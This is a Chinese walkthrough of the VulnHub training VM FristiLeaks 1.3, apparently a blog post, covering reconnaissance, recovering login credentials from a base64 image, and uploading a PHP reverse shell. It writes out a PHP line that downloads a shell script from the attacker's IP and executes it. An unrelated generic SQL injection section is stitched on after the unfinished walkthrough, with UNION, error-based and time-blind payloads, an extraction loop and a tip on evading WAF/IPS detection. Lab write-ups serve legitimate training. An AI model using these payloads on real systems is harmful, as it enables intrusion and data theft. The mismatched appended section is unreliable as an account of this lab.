靶机:FristiLeaks_1.3

本文详细记录了使用FristiLeaks_1.3.ova靶机进行渗透测试的过程,包括下载安装、环境配置、信息收集、Web漏洞利用、上传反弹shell木马等关键步骤。

下载连接
https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea
ks/FristiLeaks_1.3.ova
运行环境
Virtualbox (二选一) Vnware Workstation player
VMware用户将需要手动将VM的靶机的MAC地址编辑为:08:00:27:A5:A6:76
配置成功即可出现ip地址
这里我用的是nat模式
在这里插入图片描述
使用netdiscove -r 192.168.88.0/24
主要的主动模式,一般通过一个已知的IP来扫描一段IP
在这里插入图片描述
nmap发现只开放了80端口,所以细扫一下80端口
在这里插入图片描述
进入web站点,查看页面源码,在这里插入图片描述

好像是要在四小时内获取flag

根据nmap扫描结果存在robots.txt文件
在这里插入图片描述

访问三个路径,都是相同的图片
dib扫描下目录,发现http://192.168.88.138/images/
在这里插入图片描述
这张图片似乎是个提示,我们进入http://192.168.88.138/fristi/
在这里插入图片描述
一个登录窗口
在这里插入图片描述
查看页面源代码我们得知 页面是叫eezeepz的人留下的,那么那就有这种可能:他也许用eezeepz当做他的用户名或者密码。还有
超级leet密码登录测试页面。我们对图像使用base64编码,因此它们在HTML中是内联的。我在网上看到,这是一个很好的方法。
在这里插入图片描述
页面下方还有一个base64加密文档
在这里插入图片描述

将源代码下文的绿色字体复制进一个文件里
在这里插入图片描述
使用base64命令解码
在这里插入图片描述

根据文件格式,转换为png格式
在这里插入图片描述

在根目录下查看图片
在这里插入图片描述
试试 username:eezeepz password:keKkeKKeKKeKkEkkEk
不出所料,这个就是密码 登录
在这里插入图片描述
发现一个文件上传的功能点 这时我们要下载反弹shell的脚本木马
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
解压完成后
在这里插入图片描述

修改此php文件的目标IP地址和监听端口

在这里插入图片描述

开启监听
在这里插入图片描述

将其后缀加上.jpg,上传
在这里插入图片描述
上传成功
在这里插入图片描述
使用nv -nlvp 8888 监听发现监听不了
在这里插入图片描述
百度了好久,发现新办法
在Kali上写个PHP反弹shell的脚本;并开启Apache服务
在这里插入图片描述
service apache2 start

在物理机上写个下载并执行该脚本的PHP代码

<?php system("wget 192.168.88.135/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

在这里插入图片描述
目前就做到这,以后再补

### 利用SQL注入技术从靶机中提取Key值 SQL注入是一种通过构造恶意输入来改变SQL查询逻辑的安全漏洞。攻击者可以利用这种漏洞从目标数据库中提取敏感信息,例如Key值。以下是实现此目标的详细方法。 #### 构造SQL注入Payload以提取Key值 假设目标系统存在类似以下的SQL查询: ```sql SELECT * FROM users WHERE id = &#39;user_input&#39;; ``` 攻击者可以通过构造以下Payload实现信息提取: ```plaintext 1&#39; UNION ALL SELECT concat_ws(&#39;~&#39;,table_name,column_name) FROM information_schema.columns WHERE table_schema=database() -- - ``` 这将导致生成的SQL查询变为: ```sql SELECT * FROM users WHERE id = &#39;1&#39; UNION ALL SELECT concat_ws(&#39;~&#39;,table_name,column_name) FROM information_schema.columns WHERE table_schema=database() -- -&#39;; ``` 上述查询使用了`UNION ALL SELECT`语句[^2],将原始查询与攻击者构造的新查询合并,同时利用`concat_ws()`函数将表名和列名组合输出。注释符号`-- -`用于忽略后续的SQL语法。 #### 使用报错注入技术提取Key值 如果目标系统未关闭数据库报错功能,可以利用报错注入技术直接获取Key值。例如,使用`extractvalue()`函数构造以下Payload: ```plaintext 1&#39; AND extractvalue(1,concat(0x3a,(SELECT key_value FROM key_table))) -- - ``` 这将触发数据库错误,并在错误消息中回显Key值[^1]。 #### 时间盲注技术提取Key值 如果目标系统既无回显也无报错,可以使用时间盲注技术逐位提取Key值。例如,构造以下Payload: ```plaintext 1&#39; AND IF(SUBSTRING((SELECT key_value FROM key_table),1,1)=&#39;A&#39;,SLEEP(5),0) -- - ``` 如果条件成立,查询将延迟5秒执行,从而推断出Key值的每一位[^4]。 #### 代码示例 以下是一个可能的时间盲注Payload示例: ```python for i in range(1, len_key + 1): for char in possible_chars: payload = f"1&#39; AND IF(SUBSTRING((SELECT key_value FROM key_table),{i},1)=&#39;{char}&#39;,SLEEP(5),0) -- -" # 发送请求并测量响应时间 if response_time > 5: key += char break ``` #### 注意事项 为了确保攻击成功,需要注意以下几点: - 确保目标系统使用的数据库是MySQL,并且版本支持相关函数。 - 如果文件路径中包含特殊字符,需进行适当的URL编码。 - 避免触发WAF(Web应用防火墙)或IPS(入侵防御系统)的检测。 #### 防护措施 为了防止SQL注入漏洞,建议采取以下措施: - 使用参数化查询或预编译语句,避免直接拼接用户输入[^4]。 - 对所有输入数据进行严格验证和转义。 - 禁止数据库用户拥有不必要的高权限。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值